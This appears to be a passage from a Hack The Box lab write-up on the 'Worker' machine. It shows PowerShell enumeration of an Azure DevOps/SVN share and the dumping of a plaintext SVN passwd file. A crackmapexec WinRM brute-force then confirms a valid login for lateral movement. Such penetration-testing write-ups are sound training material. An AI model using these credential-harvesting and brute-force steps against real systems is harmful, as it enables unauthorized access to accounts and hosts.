W: Drive
peas has listed an unusual drive within the target system; w:
ps c:\> net share
Share name Resource Remark
-------------------------------------------------------------------------------
c$ c:\ Default share
IPC$ Remote IPC
w$ w:\ Default share
admin$ c:\Windows Remote Admin
The command completed successfully.the w: drive is also shared over SMB
ps c:\> cd W:\ ; ls
directory: W:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2020-06-16 18:59 agents
d----- 2020-03-28 14:57 AzureDevOpsData
d----- 2020-04-03 11:31 sites
d----- 2020-06-20 16:04 svnreposnavigating to the w: drive, I discovered a directory structure indicative of Azure DevOps components. Key directories include agents, AzureDevOpsData, sites, and svnrepos
the w:\agents directory likely contains data related to build agents, and the W:\AzureDevOpsData directory may store data associated with Azure DevOps services. However, since the foothold has already been established through the exploitation of the instance, enumerating these directories may not be immediately relevant for the current objective.
sites
PS W:\> ls sites
Directory: W:\sites
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2023-11-23 18:46 alpha.worker.htb
d----- 2020-07-20 23:43 cartoon.worker.htb
d----- 2020-04-03 12:27 dimension.worker.htb
d----- 2020-07-20 23:43 lens.worker.htb
d----- 2020-07-20 23:43 solid-state.worker.htb
d----- 2020-08-03 12:33 spectral.worker.htb
d----- 2020-07-20 23:43 story.worker.htb
d----- 2020-07-20 23:43 twenty.worker.htb The structure under the W:\sites directory reveals individual directories for different worker instances, hosting all the virtual hosts / sub-domains found earlier.
Additionally, all the web applications are hosted in each respective virtual host / sub-domain
svnrepos
ps w:\> tree /F /A W:\svnrepos
Folder PATH listing for volume Work
volume serial number is 0000414b e82a:AEA8
w:\SVNREPOS
\---www
| format
| README.txt
|
+---conf
| authz
| hooks-env.tmpl
| passwd
| svnserve.conf
|
+---db
| | current
| | format
| | fs-type
| | fsfs.conf
| | min-unpacked-rev
| | rep-cache.db
| | rep-cache.db-journal
| | txn-current
| | txn-current-lock
| | uuid
| | write-lock
| |
| +---revprops
| | \---0
| | 0
| | 1
| | 2
| | 3
| | 4
| | 5
| |
| +---revs
| | \---0
| | 0
| | 1
| | 2
| | 3
| | 4
| | 5
| |
| +---transactions
| \---txn-protorevs
+---hooks
| post-commit.tmpl
| post-lock.tmpl
| post-revprop-change.tmpl
| post-unlock.tmpl
| pre-commit.tmpl
| pre-lock.tmpl
| pre-revprop-change.tmpl
| pre-unlock.tmpl
| start-commit.tmpl
|
\---locks
db-logs.lock
db.lockthe svnrepos directory indicates the integration of Apache Subversion. It’s rather evident at this point that the target Azure DevOps instance is configured to manage Subversion version control alongside its default capabilities. This can be an additional feature or customization beyond the default installation, emphasizing the flexibility of Azure DevOps to support various version control systems.
i will check the sub-directory, w:\svnrepos\www\conf, as it contains what appears to be the most relevant data for the current scope of operation
w:\svnrepos\www\conf
PS W:\> cd W:\svnrepos\www\conf ; ls
Directory: W:\svnrepos\www\conf
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2020-06-20 11:29 1112 authz
-a---- 2020-06-20 11:29 904 hooks-env.tmpl
-a---- 2020-06-20 15:27 1031 passwd
-a---- 2020-04-04 20:51 4454 svnserve.confauthz
ps w:\svnrepos\www\conf> cat authz | Where { $_ -notmatch '^#' }
[aliases]
[groups]The file seems empty
hooks-env.tmpl
PS W:\svnrepos\www\conf> cat hooks-env.tmpl | Where { $_ -notmatch '^#' }
[default]
LANG = en_US.UTF-8
[pre-commit]
PATH = /usr/local/bin:/usr/bin:/usr/sbinThe hooks-env.tmpl file is an irrelevant template file
passwd
ps w:\svnrepos\www\conf> cat passwd | Where { $_ -notmatch '^#' }
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = fridayThe passwd file contains what appears to be a list of credential pairs, delimited by the = character
While a valid system user, robisl, can be seen in the list, I will save the whole content into files to prepare for a brute-force attack against the target WinRM server to hopefully validate the credential of robisl user, and additionally find other potentially valid system credentials.
Brute-force Attack
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ crackmapexec winrm $IP -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.10.203 5985 NONE [*] None (name:10.10.10.203) (domain:None)
HTTP 10.10.10.203 5985 NONE [*] http://10.10.10.203:5985/wsman
[...REDACTED...]
WINRM 10.10.10.203 5985 NONE [+] None\robisl:wolves11 (Pwn3d!)
[...REDACTED...]crackmapexec returned a single valid system credential; robisl
Remote Management Users
ps w:\svnrepos\www\conf> cmd /c NET localgroup "Remote Management Users" | Select-String robisl
robisl
The robisl user is part of the Remote Management Users group
Moving on to the Lateral Movement phase
svnserve.conf
PS W:\svnrepos\www\conf> cat svnserve.conf | Where { $_ -notmatch '^#' }
[general]
password-db = passwd
[sasl]While the svnserve.conf file contains a password, it appears to be default